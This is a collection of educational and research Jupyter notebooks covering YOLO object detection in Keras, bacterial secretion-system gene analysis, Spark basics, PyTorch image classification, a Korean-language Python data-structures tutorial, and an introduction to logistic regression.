optimizer = Adam(lr=0.1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
#optimizer = SGD(lr=1e-4, decay=0.0005, momentum=0.9)
#optimizer = RMSprop(lr=1e-4, rho=0.9, epsilon=1e-08, decay=0.0)
model.load_weights("wednesday2.h5")
model.compile(loss=custom_loss, optimizer=optimizer)
history = model.fit_generator(generator        = train_batch,
                              steps_per_epoch  = len(train_batch),
                              epochs           = 100,
                              verbose          = 1,
                              validation_data  = valid_batch,
                              validation_steps = len(valid_batch),
                              callbacks        = [early_stop, checkpoint, tensorboard],
                              max_queue_size   = 3)
#print(history.history.keys())
# summarize history for accuracy
#plt.plot(history.history['loss'])
#plt.plot(history.history['val_loss'])
#plt.title('model loss')
#plt.ylabel('loss')
#plt.xlabel('epoch')
#plt.legend(['train', 'test'], loc='upper left')
#plt.show()
```
# Perform detection on image
```
model.load_weights("best_weights.h5")
image = cv2.imread('train_image_folder/00001018.jpg')
dummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))
plt.figure(figsize=(10,10))
input_image = cv2.resize(image, (416, 416))
input_image = input_image / 255.
input_image = input_image[:,:,::-1]
input_image = np.expand_dims(input_image, 0)
netout = model.predict([input_image, dummy_array])
boxes = decode_netout(netout[0],
obj_threshold=0.3,
nms_threshold=NMS_THRESHOLD,
anchors=ANCHORS,
nb_class=CLASS)
image = draw_boxes(image, boxes, labels=LABELS)
plt.imshow(image[:,:,::-1]); plt.show()
```
# Perform detection on video
```
model.load_weights("weights_coco.h5")
dummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))
video_inp = '../basic-yolo-keras/images/phnom_penh.mp4'
video_out = '../basic-yolo-keras/images/phnom_penh_bbox.mp4'
video_reader = cv2.VideoCapture(video_inp)
nb_frames = int(video_reader.get(cv2.CAP_PROP_FRAME_COUNT))
frame_h = int(video_reader.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_w = int(video_reader.get(cv2.CAP_PROP_FRAME_WIDTH))
video_writer = cv2.VideoWriter(video_out,
cv2.VideoWriter_fourcc(*'XVID'),
50.0,
(frame_w, frame_h))
for i in tqdm(range(nb_frames)):
ret, image = video_reader.read()
input_image = cv2.resize(image, (416, 416))
input_image = input_image / 255.
input_image = input_image[:,:,::-1]
input_image = np.expand_dims(input_image, 0)
netout = model.predict([input_image, dummy_array])
boxes = decode_netout(netout[0],
obj_threshold=0.3,
nms_threshold=NMS_THRESHOLD,
anchors=ANCHORS,
nb_class=CLASS)
image = draw_boxes(image, boxes, labels=LABELS)
video_writer.write(np.uint8(image))
video_reader.release()
video_writer.release()
```
|
github_jupyter
|
# Explore secretion system genes
[KEGG enrichment analysis](5_KEGG_enrichment_of_stable_genes.ipynb) found that genes associated with the ribosome, lipopolysaccharide (outer membrane) biosynthesis, and the citrate cycle are significantly conserved across strains.
Indeed, essential functions appear to be significantly conserved across strains, as expected.
However, there are also pathways, like the secretion systems that allow for inter-strain warfare, that we'd expect to vary across strains but were found to be conserved (T3SS significant but not T6SS).
This notebook examines the stability scores of the genes in the secretion systems to determine whether the subset of secretion genes related to the machinery is conserved while others, like the secreted proteins, are more variable.
```
%load_ext autoreload
%autoreload 2
%matplotlib inline
import os
import random
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from scripts import annotations
random.seed(1)
```
## Load data and metadata
```
# Input similarity scores and annotations filenames
# Since the results are similar we only need to look at the scores for one strain type
pao1_similarity_filename = "pao1_core_similarity_associations_final_spell.tsv"
# Import df
pao1_similarity = pd.read_csv(pao1_similarity_filename, sep="\t", index_col=0, header=0)
pao1_similarity.head()
# Load KEGG pathway data
pao1_pathway_filename = "https://raw.githubusercontent.com/greenelab/adage/7a4eda39d360b224268921dc1f2c14b32788ab16/Node_interpretation/pseudomonas_KEGG_terms.txt"
pao1_pathways = annotations.load_format_KEGG(pao1_pathway_filename)
print(pao1_pathways.shape)
pao1_pathways.head()
```
## Get genes related to secretion pathways
```
pao1_pathways.loc[
[
"KEGG-Module-M00334: Type VI secretion system",
"KEGG-Module-M00332: Type III secretion system",
"KEGG-Module-M00335: Sec (secretion) system",
]
]
# Get genes related to pathways
T6SS_genes = list(pao1_pathways.loc["KEGG-Module-M00334: Type VI secretion system", 2])
T3SS_genes = list(pao1_pathways.loc["KEGG-Module-M00332: Type III secretion system", 2])
secretion_genes = list(
pao1_pathways.loc["KEGG-Module-M00335: Sec (secretion) system", 2]
)
# Pull out similarity scores for the genes in each secretion system
T6SS_similarity = pao1_similarity.reindex(T6SS_genes)
T3SS_similarity = pao1_similarity.reindex(T3SS_genes)
sec_similarity = pao1_similarity.reindex(secretion_genes)
T6SS_similarity.sort_values(by="Transcriptional similarity across strains")
T3SS_similarity.sort_values(by="Transcriptional similarity across strains")
# sec_similarity.sort_values(by="Transcriptional similarity across strains")
# Save T3SS and T6SS df for easier lookup
T3SS_similarity.to_csv("T3SS_core_similarity_associations_final_spell.tsv", sep="\t")
T6SS_similarity.to_csv("T6SS_core_similarity_associations_final_spell.tsv", sep="\t")
```
## Plot
```
plt.figure(figsize=(10, 8))
sns.violinplot(
data=pao1_similarity,
x="Transcriptional similarity across strains",
palette="Blues",
inner=None,
)
sns.swarmplot(
data=T6SS_similarity,
x="Transcriptional similarity across strains",
color="k",
label="T6SS genes",
alpha=0.8,
)
sns.swarmplot(
data=T3SS_similarity,
x="Transcriptional similarity across strains",
color="r",
label="T3SS genes",
alpha=0.8,
)
# sns.swarmplot(
# data=sec_similarity,
# x="Transcriptional similarity across strains",
# color="yellow",
# label="secretion system genes",
# alpha=0.8,
# )
# Add text labels for least stable genes amongst the T3SS/T6SS
plt.text(
x=T3SS_similarity.loc[
T3SS_similarity["Name"] == "pscR", "Transcriptional similarity across strains"
],
y=0.02,
s="$pscR$",
)
plt.text(
x=T6SS_similarity.loc[
T6SS_similarity["Name"] == "vgrG6", "Transcriptional similarity across strains"
],
y=-0.02,
s="$vgrG6$",
)
plt.text(
x=T6SS_similarity.loc[
T6SS_similarity["Name"] == "vgrG3", "Transcriptional similarity across strains"
],
y=-0.02,
s="$vgrG3$",
)
plt.text(
x=T6SS_similarity.loc[
T6SS_similarity["Name"] == "vgrG4a", "Transcriptional similarity across strains"
],
y=-0.02,
s="$vgrG4a$",
)
plt.title("Stability of secretion system genes", fontsize=14)
plt.legend()
```
We hypothesized that most secretion machinery genes would be conserved but that secreted proteins (i.e. effector proteins) would be less conserved. In general, the effector proteins were not included in the KEGG annotations, which is probably why these secretion systems were found to be highly stable.
T6SS genes are among the most stable, with vgrG6, vgrG3, and vgrG4a among the least stable. T3SS genes are likewise among the most stable, with pscR among the least stable.
We need to read more about these genes to see whether it makes sense that they rank at the bottom.
|
github_jupyter
|
## Launching Spark
Spark's Python console can be launched directly from the command line with `pyspark`. The SparkSession is available through the `spark` object. The Spark SQL console can be launched with `spark-sql`. We will experiment with these in the upcoming sessions.
If we have `pyspark` and the other required packages installed, we can also launch a SparkSession from a Python notebook environment. In order to do this we need to import the `pyspark` package.
Databricks and Google Dataproc notebooks already have pyspark installed, and we can simply access the SparkSession through the `spark` object.
## The SparkSession
You control your Spark Application through a driver process called the SparkSession. The SparkSession instance is the way Spark executes user-defined manipulations across the cluster. There is a one-to-one correspondence between a SparkSession and a Spark Application. In Scala and Python, the variable is available as `spark` when you start the console. Let’s go ahead and look at the SparkSession:
```
spark
```
<img src="https://github.com/soltaniehha/Big-Data-Analytics-for-Business/blob/master/figs/04-02-SparkSession-JVM.png?raw=true" width="700" align="center"/>
## Transformations
Let’s now perform the simple task of creating a range of numbers. This range of numbers is just like a named column in a spreadsheet:
```
myRange = spark.range(1000).toDF("number")
```
We created a DataFrame with one column containing 1,000 rows with values from 0 to 999. This range of numbers represents a distributed collection. When run on a cluster, each part of this range of numbers exists on a different executor. This is a Spark DataFrame.
```
myRange
```
Calling `myRange` returns only the DataFrame object itself, not its contents, because we haven't yet materialized the recipe for the DataFrame that we just created.
Core data structures in Spark are immutable, meaning they cannot be changed after they’re created.
To “change” a DataFrame, you need to instruct Spark how you would like to modify it to do what you want.
These instructions are called **transformations**. Transformations are lazy operations, meaning that they won’t do any computation or return any output until they are asked to by an action.
Let’s perform a simple transformation to find all even numbers in our current DataFrame:
```
divisBy2 = myRange.where("number % 2 = 0")
divisBy2
```
The "where" statement specifies a narrow dependency, in which each input partition contributes to at most one output partition. Transformations are the core of how you express your business logic using Spark. Spark will not act on transformations until we call an **action**.
### Lazy Evaluation
Lazy evaluation means that Spark will wait until the very last moment to execute the graph of computation instructions. In Spark, instead of modifying the data immediately when you express some operation, you build up a plan of transformations that you would like to apply to your source data. By waiting until the last minute to execute the code, Spark compiles this plan from your raw DataFrame transformations to a streamlined physical plan that will run as efficiently as possible across the cluster. This provides immense benefits because Spark can optimize the entire data flow from end to end. An example of this is something called predicate pushdown on DataFrames. If we build a large Spark job but specify a filter at the end that only requires us to fetch one row from our source data, the most efficient way to execute this is to access the single record that we need. Spark will actually optimize this for us by pushing the filter down automatically.
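Spark's laziness can be mimicked in plain Python with generator pipelines, which also defer all work until a terminal operation consumes them. This is only a loose analogy (no optimizer, no cluster), not Spark itself:

```python
# A loose analogy to lazy transformations: generator pipelines in plain Python.
# Nothing below runs until the terminal sum() "action" consumes the pipeline.
applied = []

def numbers(n):
    for i in range(n):
        applied.append(i)   # record that work actually happened
        yield i

pipeline = (x for x in numbers(1000) if x % 2 == 0)  # "transformation": nothing computed yet
assert applied == []        # no work done so far, like an unexecuted Spark plan

total = sum(pipeline)       # "action": triggers the whole pipeline
print(total)                # sum of the even numbers in [0, 1000)
```

As with Spark, building the pipeline is cheap; only the final consuming call pays the cost of the computation.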
## Actions
Transformations allow us to build up our logical transformation plan. To trigger the computation, we run an action. An action instructs Spark to compute a result from a series of transformations. The simplest action is count, which gives us the total number of records in the DataFrame:
```
divisBy2.count()
```
There are three kinds of actions:
* Actions to view data in the console
* Actions to collect data to native objects in the respective language
* Actions to write to output data sources
|
github_jupyter
|
```
import torch
import math
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import torch.optim as optim
import torch.utils
import PIL
from matplotlib import pyplot as plt
from PIL import Image
from torchvision import transforms
from torchvision import datasets
#Downloading CIFAR-10
data_path = '../data-unversioned/p1ch7/'
cifar10 = datasets.CIFAR10(data_path, train=True, download=True)
cifar10_val = datasets.CIFAR10(data_path, train=False, download=True)  # use a proxy if the download is too slow
# Dataset initialization with normalization
tensor_cifar10_normalize_train = datasets.CIFAR10(data_path, train=True, download=False,
                            transform = transforms.Compose([
                            transforms.ToTensor(),
                            transforms.Normalize((0.4915, 0.4823, 0.4468),
                                                 (0.2470, 0.2435, 0.2616))
]))
tensor_cifar10_normalize_val = datasets.CIFAR10(data_path, train=False, download=False,
                            transform = transforms.Compose([
                            transforms.ToTensor(),
                            transforms.Normalize((0.4915, 0.4823, 0.4468),
                                                 (0.2470, 0.2435, 0.2616))
]))
# Build the dataset and DataLoader
label_map = {0: 0, 2: 1}  # map the CIFAR labels airplane (0) and bird (2) to 0/1
class_names = ['airplane', 'bird']
# Training set
cifar2 = [(img, label_map[label])
          for img, label in tensor_cifar10_normalize_train
          if label in [0, 2]]
# Validation set
cifar2_val = [(img, label_map[label])
              for img, label in tensor_cifar10_normalize_val
              if label in [0, 2]]
train_loader = torch.utils.data.DataLoader(cifar2, batch_size=64, shuffle=True)
from IPython import display
from d2l import torch as d2l

class Animator:  #@save
    """Plot data in an animation."""
    def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,
                 ylim=None, xscale='linear', yscale='linear',
                 fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,
                 figsize=(3.5, 2.5)):
        # Incrementally plot multiple lines
        if legend is None:
            legend = []
        d2l.use_svg_display()
        self.fig, self.axes = d2l.plt.subplots(nrows, ncols, figsize=figsize)
        if nrows * ncols == 1:
            self.axes = [self.axes, ]
        # Use a lambda to capture the axis-configuration arguments
        self.config_axes = lambda: d2l.set_axes(
            self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
        self.X, self.Y, self.fmts = None, None, fmts
    def add(self, x, y):
        # Add multiple data points to the figure
        if not hasattr(y, "__len__"):
            y = [y]
        n = len(y)
        if not hasattr(x, "__len__"):
            x = [x] * n
        if not self.X:
            self.X = [[] for _ in range(n)]
        if not self.Y:
            self.Y = [[] for _ in range(n)]
        for i, (a, b) in enumerate(zip(x, y)):
            if a is not None and b is not None:
                self.X[i].append(a)
                self.Y[i].append(b)
        self.axes[0].cla()
        for x, y, fmt in zip(self.X, self.Y, self.fmts):
            self.axes[0].plot(x, y, fmt)
        self.config_axes()
        display.display(self.fig)
        display.clear_output(wait=True)
device = torch.device('cuda:0')
model_F3 = nn.Sequential(
nn.Linear(3072, 512),
nn.Tanh(),
nn.Linear(512, 2),
nn.LogSoftmax(dim=1))
model_F3.to(device)
lr = 1e-2
optimizer = optim.SGD(model_F3.parameters(),lr =lr)
loss_fn = nn.NLLLoss()
n_epochs = 100
for epoch in range(n_epochs):
for imgs, labels in train_loader:
imgs, labels = imgs.to(device), labels.to(device)
batch_size = imgs.shape[0]
outputs = model_F3(imgs.view(batch_size, -1))
loss = loss_fn(outputs, labels)
#out = model_F3(img.view(-1).unsqueeze(0)).to(device)
#loss = loss_fn(out,torch.tensor([label]))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print("Epoch: %d, Loss: %f" % (epoch, float(loss)))
class model_chap7(nn.Module):
    def __init__(self, config):
        super(model_chap7, self).__init__()
        self._config = config
        # The original left the layer sizes commented out; the values below are
        # assumed defaults so the class is runnable (override them via config).
        num_items = config.get('num_items', 1000)
        hidden_units = config.get('hidden_units', 500)
        self._lambda_value = config['lambda']
        self.encoder = nn.Sequential(nn.Linear(num_items, hidden_units), nn.Sigmoid())
        self.decoder = nn.Linear(hidden_units, num_items)
    def forward(self, torch_input):
        encoder = self.encoder(torch_input)
        decoder = self.decoder(encoder)
        return decoder
    def loss(self, decoder, input, optimizer, mask_input):
        # Masked reconstruction error: only observed entries (mask == 1) contribute
        rmse = ((decoder - input) * mask_input).pow(2).sum()
        cost = rmse
        # L2 regularization on all parameters, weighted by lambda
        for p in self.parameters():
            cost = cost + self._lambda_value * 0.5 * p.pow(2).sum()
        return cost, rmse
class NetWidth(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(32, 16, kernel_size=3, padding=1)
self.fc1 = nn.Linear(16 * 8 * 8, 32)
self.fc2 = nn.Linear(32, 2)
def forward(self, x):
out = F.max_pool2d(torch.tanh(self.conv1(x)), 2)
out = F.max_pool2d(torch.tanh(self.conv2(out)), 2)
out = out.view(-1, 16 * 8 * 8)
out = torch.tanh(self.fc1(out))
out = self.fc2(out)
return out
autorec_config = \
{
'train_ratio': 0.9,
'num_epoch': 100,
'batch_size': 100,
'optimizer': 'SGD',
'adam_lr': 1e-2,
'lambda': 1,
'device_id': 2,
'use_cuda': True,
'model_name': 'model_chap7'
}
# Instantiate the AutoRec model
model = model_chap7(autorec_config)
optimizer = optim.SGD(model.parameters(), lr=autorec_config['adam_lr'])
'''Train'''
def train(epoch):
    # NOTE: train_loader, batch_mask_x, train_mask_r and animator must be
    # defined elsewhere for this routine to run.
    cost_all = 0
    RMSE = 0
    for step, (batch_x, batch_y) in enumerate(train_loader):
        batch_x = batch_x.type(torch.FloatTensor)
        decoder = model(batch_x)  # Step 1: forward pass, compute predictions
        cost, rmse = model.loss(decoder=decoder, input=batch_x, optimizer=optimizer, mask_input=batch_mask_x)  # Step 2: compute the loss
        optimizer.zero_grad()  # Zero the gradients before backpropagation
        cost.backward()  # Step 3: backpropagation
        optimizer.step()  # Update all parameters in one step
        cost_all += cost
        RMSE += rmse
    RMSE = np.sqrt(RMSE.detach().cpu().numpy() / (train_mask_r == 1).sum())
    animator.add(epoch + 1, RMSE)
```
|
github_jupyter
|
2018-10-26
Pragmatic Python 101 - Part 2
[김영호](https://www.linkedin.com/in/danielyounghokim/)
Difficulty ● ● ◐ ○ ○
# Data Structures
- Immutable vs. Mutable
- Immutable: `tuple`
- Mutable: `list`, `set`, `dict`
- Order in which each mutable container is covered
    - Initialization
    - Adding/removing
    - Accessing specific values
    - Sorting
## `tuple`
### Initialization
```
seq = ()
type(seq)
seq = (1, 2, 3)
seq
```
### Checking the size
```
len(seq)
```
The result is displayed wrapped in `(` and `)`, with `,` as the separator.
```
type(seq)
```
The elements may have different types.
```
('월', 10, '일', 26)
```
### Access
```
seq[0]
```
### Immutability
Anything defined as a `tuple` cannot be changed (immutable).
```
seq[0] = 4  # raises TypeError
```
### Unpacking
```
fruits_tuple = ('orange', 'apple', 'banana')
fruit1, fruit2, fruit3 = fruits_tuple
print(fruit1)
print(fruit2)
print(fruit3)
```
## `list`
- An extremely important data structure, because it is used all the time
### Initialization
```
temp_list = []
type(temp_list)
temp_list = [1, 'a', 3.4]
temp_list
```
#### `list` of `tuple`s
```
temp_list = [
('김 책임', '남'),
('박 선임', '여'),
('이 수석', '남', 15),
('최 책임', '여')
]
```
The tuples may have different lengths.
#### `list` of `list`s
```
temp_list = [
['김 책임', '남'],
['박 선임', '여'],
['이 수석', '남', 15],
['최 책임', '여']
]
```
Each inner `list` may have a different size.
How do we easily convert a `list` of `tuple`s into a `list` of `list`s?
- Covered in Part 3.
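As a quick preview ahead of Part 3 (one common approach, not necessarily the one Part 3 will use), a list comprehension does the conversion in one line:

```python
temp_list = [
    ('김 책임', '남'),
    ('박 선임', '여'),
    ('이 수석', '남', 15),
    ('최 책임', '여')
]
as_lists = [list(t) for t in temp_list]   # each tuple becomes a list
print(as_lists)
```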
#### Initializing a specific number of identical values
```
temp_list = [0] * 10
temp_list
```
### Checking the size
```
len(temp_list)
```
### Unpacking
```
fruits_list = ['orange', 'apple', 'banana']
fruit1, fruit2, fruit3 = fruits_list
print(fruit1)
print(fruit2)
print(fruit3)
```
### Adding
```
temp_list = []
temp_list.append('김 책임')
temp_list.append('이 수석')
temp_list
```
Inserting at a specific position
```
temp_list
temp_list.insert(1, '박 선임')
temp_list
```
### Removing
- ~~I rarely use this~~
`remove(x)` deletes the first occurrence of x in the `list`
```
l = ['a', 'b', 'c', 'd', 'b']
l.remove('b')
l
```
How do we remove every `b` at once?
- We'll try it in Part 3.
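As a quick preview ahead of Part 3 (one common approach, not necessarily the one Part 3 will use), a list comprehension filters out every occurrence at once:

```python
l = ['a', 'b', 'c', 'd', 'b']
without_b = [x for x in l if x != 'b']    # keep everything that is not 'b'
print(without_b)                          # ['a', 'c', 'd']
```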
### Accessing & changing specific values
- It helps to just think of a `list` as an array.
- Indexing starts at 0
```
nums = [1, 2, 3, 4, 5]
nums[2] = 6
nums
```
#### slicing
```
nums = [1, 2, 3, 4, 5]
print(nums)              # prints "[1, 2, 3, 4, 5]"
print(nums[2:4])         # slice from index 2 to 4 (exclusive); prints "[3, 4]"
print(nums[2:])          # slice from index 2 to the end; prints "[3, 4, 5]"
print(nums[:2])          # slice from the start to index 2 (exclusive); prints "[1, 2]"
print(nums[:])           # slice of the whole list; prints "[1, 2, 3, 4, 5]"
print(nums[:-1])         # slice indices can be negative; prints "[1, 2, 3, 4]"
nums[2:4] = [8, 9]       # assign a new list to a slice
print(nums)              # prints "[1, 2, 8, 9, 5]"
```
#### Slicing & Changing
```
nums = [1, 2, 3, 4, 5]
nums[1:3] = [6, 7]
nums
```
### Miscellaneous: reversing, ...
```
nums = [1, 2, 3, 4, 5]
nums[::-1]
```
Access every second element in forward order
```
nums[::2]
```
Access every second element in reverse order
```
nums[::-2]
```
### Sorting
- Use the built-in function `sorted`
- `.sort()` → in place
```
temp_list = [3, 2, 5, 8, 1, 7]
sorted(temp_list)
sorted(temp_list, reverse = True)
```
### Checking whether a value exists
```
temp_list = ['김 책임', '박 선임', '이 수석']
'김 책임' in temp_list
'이 선임' in temp_list
```
### `list` ↔ `tuple`
```
temp_list = [1, 2, 3, 4, 5]
tuple(temp_list)
type(tuple(temp_list))
```
### `str` & `list`
#### `split()`: splitting a string (tokenization)
```
multi_line_str = '''
이름: 김영호
직급: 책임컨설턴트
소속: 데이터분석그룹
'''
print(multi_line_str)
multi_line_str
multi_line_str.strip()
multi_line_str.strip().split('\n')
```
#### Splitting a `str`
```
tokens = multi_line_str.strip().split('\n')
tokens
```
#### Joining multiple `str`s
```
'\n'.join(tokens)
```
### Concatenating multiple `list`s
```
l1 = [1, 2, 3, 4, 5]
l2 = ['a', 'b', 'c']
l3 = ['*', '!', '%', '$']
# BETTER (Python 3.5+, PEP 448 iterable unpacking)
[*l1, *l2, *l3]
# For older Python versions
l = []
l.extend(l1)
l.extend(l2)
l.extend(l3)
l
```
## `set`
- Use case: removing duplicates
### Initialization
```
temp_set = set()
type(temp_set)
```
You can also initialize it from a `tuple`.
```
temp_set = set((1, 2, 1, 3))
temp_set
```
Note that the duplicates have been removed. The values are displayed between `{` and `}`, separated by `,`.
You can also initialize it from a `list`.
```
temp_set = set([1, 2, 1, 3])
```
You can also initialize it with a literal, as below.
```
temp_set = {1, 2, 1, 3}
type(temp_set)
```
### Checking the size
```
len(temp_set)
```
### Adding
```
temp_set = set([1, 2])
temp_set.add(1)
temp_set
```
Adding several values at once
```
temp_set.update([2, 3, 4])
temp_set
```
### Removing
```
temp_set = set([1, 2, 3])
temp_set.remove(2)
temp_set
```
### Accessing specific values
- Random access is not supported
### Checking whether a value exists
```
temp_set = set(['김 책임', '박 선임', '이 수석'])
'김 책임' in temp_set
'김 책임님' in temp_set
```
### Operations
- Reference: https://github.com/brennerm/PyTricks/blob/master/setoperators.py
#### Union
```
food_set1 = {'짬뽕', '파스타', '쌀국수'}
food_set2 = {'짬뽕', '탕수육', '볶음밥'}
food_set1.union(food_set2)
```
#### Intersection
```
food_set1.intersection(food_set2)
```
#### Difference
```
food_set1.difference(food_set2)
```
Elements that also appear in the other set are excluded.
### `list` ↔ `set`
- Possible when the `list` contains only immutable objects
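A quick sketch of that restriction (the variable names here are just illustrative): a list of hashable elements converts cleanly, while a list containing a mutable object raises `TypeError`.

```python
dedup = set([1, 2, 2, 3])   # hashable (immutable) elements: works
print(dedup)
try:
    set([[1, 2], [3]])      # a list element is mutable, hence unhashable
    converted = True
except TypeError:
    converted = False       # conversion fails with TypeError
print('converted:', converted)
```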
## `dict`
- Another core data structure that is used constantly
- Holds **pairs of `key` and `value`**
- `key`
    - only immutable types allowed
    - no duplicates allowed
- `value`
    - mutable types allowed too
### Initialization
```
temp_dict = {}
type(temp_dict)
temp_dict = {
'이름' : '김영호',
'사업부' : 'IT혁신사업부',
'소속' : '데이터분석그룹'
}
```
### Checking the size
```
len(temp_dict)
```
### Adding
```
temp_dict = {}
temp_dict['근속연차'] = 3
temp_dict['근속연차'] += 1
temp_dict['근속연차']
temp_dict['좋아하는 음식'] = set()
temp_dict['좋아하는 음식']
temp_dict['좋아하는 음식'].add('짬뽕')
temp_dict['좋아하는 음식'].add('파스타')
temp_dict['좋아하는 음식'].add('쌀국수')
temp_dict['좋아하는 음식']
```
How to handle a `dict` efficiently when a key may be missing
- Covered in the Standard Library session.
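As a small preview of that session, `collections.defaultdict` removes the need to pre-create a value for a missing key (the `favorite_foods` name below is just illustrative):

```python
from collections import defaultdict

favorite_foods = defaultdict(set)     # a missing key starts out as an empty set
favorite_foods['김영호'].add('짬뽕')    # no KeyError, even on first access
favorite_foods['김영호'].add('파스타')
print(favorite_foods['김영호'])
```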
### Removing
- ~~I rarely use this~~
### Accessing a specific key
```
temp_dict = {
'김 책임' : '남',
'박 선임' : '여',
'이 수석' : '남',
'최 책임' : '여'
}
temp_dict['김 책임']
```
What if the key does not exist?
```
temp_dict['양 책임']
```
It raises an error (`KeyError`).
How do we handle that gracefully?
```
temp_dict.get('양 책임')
temp_dict.get('양 책임', '키 없음')
```
### Checking whether a `key` exists
```
temp_dict = {
'김 책임' : '남',
'박 선임' : '여',
'이 수석' : '남',
'최 책임' : '여'
}
'김 책임' in temp_dict
```
### `list` of `tuple`s → `dict`
```
list_of_tuples = [
('김 책임', 'M+'),
('박 선임', 'M'),
('이 수석', 'E')
]
d1 = dict(list_of_tuples)
d1
l1 = ['김 책임', '박 선임', '이 수석']
l2 = ['M+', 'M', 'E']
d2 = dict(zip(l1, l2))
d2
d1 == d2
```
### Merging multiple `dict`s
```
d1 = {
'김선임' : 'M+',
'박선임' : 'M',
'이수석' : 'E'
}
d2 = {
'Apple' : 'Red',
'Banana' : 'Yellow'
}
d3 = {
'ABC' : 'DEF',
'GHI' : 'JKL'
}
d = {**d1, **d2, **d3}
d
```
### More on string formatting
```
temp_dict = {
'name' : '김영호',
'affiliation' : '삼성SDS',
}
formatted_string = '''
이름: {name}
소속: {affiliation}
'''.format(**temp_dict)
formatted_string
```
End of Part 2
References
- https://docs.python.org/ko/3/contents.html
- https://docs.python.org/ko/3/tutorial/index.html
- https://docs.python.org/3.7/howto/
- http://cs231n.github.io/python-numpy-tutorial/
- [점프 투 파이썬](https://wikidocs.net/book/1)
- https://docs.python-guide.org/
|
github_jupyter
|
# Logistic Regression
Notebook version: 2.0 (Nov 21, 2017)
2.1 (Oct 19, 2018)
Author: Jesús Cid Sueiro (jcid@tsc.uc3m.es)
Jerónimo Arenas García (jarenas@tsc.uc3m.es)
Changes: v.1.0 - First version
v.1.1 - Typo correction. Prepared for slide presentation
v.2.0 - Prepared for Python 3.0 (backward compatible with 2.7)
Assumptions for regression model modified
v.2.1 - Minor changes regarding notation and assumptions
```
from __future__ import print_function
# To visualize plots in the notebook
%matplotlib inline
# Imported libraries
import csv
import random
import matplotlib
import matplotlib.pyplot as plt
import pylab
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from sklearn.preprocessing import PolynomialFeatures
from sklearn import linear_model
```
# Logistic Regression
## 1. Introduction
### 1.1. Binary classification and decision theory. The MAP criterion
The goal of a classification problem is to assign a *class* or *category* to every *instance* or *observation* of a data collection. Here, we will assume that every instance ${\bf x}$ is an $N$-dimensional vector in $\mathbb{R}^N$, and that the class $y$ of sample ${\bf x}$ is an element of a binary set ${\mathcal Y} = \{0, 1\}$. The goal of a classifier is to predict the true value of $y$ after observing ${\bf x}$.
We will denote as $\hat{y}$ the classifier output or *decision*. If $y=\hat{y}$, the decision is a *hit*, otherwise $y\neq \hat{y}$ and the decision is an *error*.
Decision theory provides a solution to the classification problem in situations where the relation between instance ${\bf x}$ and its class $y$ is given by a known probabilistic model: assume that every tuple $({\bf x}, y)$ is an outcome of a random vector $({\bf X}, Y)$ with joint distribution $p_{{\bf X},Y}({\bf x}, y)$. A natural criterion for classification is to select predictor $\hat{Y}=f({\bf x})$ in such a way that the probability of error, $P\{\hat{Y} \neq Y\}$, is minimum. Noting that
$$
P\{\hat{Y} \neq Y\} = \int P\{\hat{Y} \neq Y | {\bf x}\} p_{\bf X}({\bf x}) d{\bf x}
$$
the optimal decision is obtained if, for every sample ${\bf x}$, we make the decision minimizing the conditional error probability:
\begin{align}
\hat{y}^* &= \arg\min_{\hat{y}} P\{\hat{y} \neq Y |{\bf x}\} \\
&= \arg\max_{\hat{y}} P\{\hat{y} = Y |{\bf x}\} \\
\end{align}
Thus, the optimal decision rule can be expressed as
$$
P_{Y|{\bf X}}(1|{\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad P_{Y|{\bf X}}(0|{\bf x})
$$
or, equivalently
$$
P_{Y|{\bf X}}(1|{\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad \frac{1}{2}
$$
The classifier implementing this decision rule is usually referred to as the MAP (*Maximum A Posteriori*) classifier. As we have seen, the MAP classifier minimizes the error probability for binary classification, but the result can also be generalized to multiclass classification problems.
### 1.2. Parametric classification.
Classical decision theory is grounded on the assumption that the probabilistic model relating the observed sample ${\bf X}$ and the true hypothesis $Y$ is known. Unfortunately, this is unrealistic in many applications, where the only available information to construct the classifier is a dataset $\mathcal D = \{{\bf x}^{(k)}, y^{(k)}\}_{k=0}^{K-1}$ of instances and their respective class labels.
A more realistic formulation of the classification problem is the following: given a dataset $\mathcal D = \{({\bf x}^{(k)}, y^{(k)}) \in {\mathbb{R}}^N \times {\mathcal Y}, \, k=0,\ldots,{K-1}\}$ of independent and identically distributed (i.i.d.) samples from an ***unknown*** distribution $p_{{\bf X},Y}({\bf x}, y)$, predict the class $y$ of a new sample ${\bf x}$ with the minimum probability of error.
Since the probabilistic model generating the data is unknown, the MAP decision rule cannot be applied. However, many classification algorithms use the dataset to obtain an estimate of the posterior class probabilities, and apply it to implement an approximation to the MAP decision maker.
Parametric classifiers based on this idea assume, additionally, that the posterior class probabilty satisfies some parametric formula:
$$
P_{Y|X}(1|{\bf x},{\bf w}) = f_{\bf w}({\bf x})
$$
where ${\bf w}$ is a vector of parameters. Given the expression of the MAP decision maker, classification consists in comparing the value of $f_{\bf w}({\bf x})$ with the threshold $\frac{1}{2}$, and each parameter vector would be associated to a different decision maker.
In practice, the dataset ${\mathcal D}$ is used to select a particular parameter vector $\hat{\bf w}$ according to certain criterion. Accordingly, the decision rule becomes
$$
f_{\hat{\bf w}}({\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad \frac{1}{2}
$$
In this lesson, we explore one of the most popular model-based parametric classification methods: **logistic regression**.
<img src="./figs/parametric_decision.png" width=400>
## 2. Logistic regression.
### 2.1. The logistic function
The logistic regression model assumes that the binary class label $Y \in \{0,1\}$ of observation $X\in \mathbb{R}^N$ satisfies the expression.
$$P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g({\bf w}^\intercal{\bf x})$$
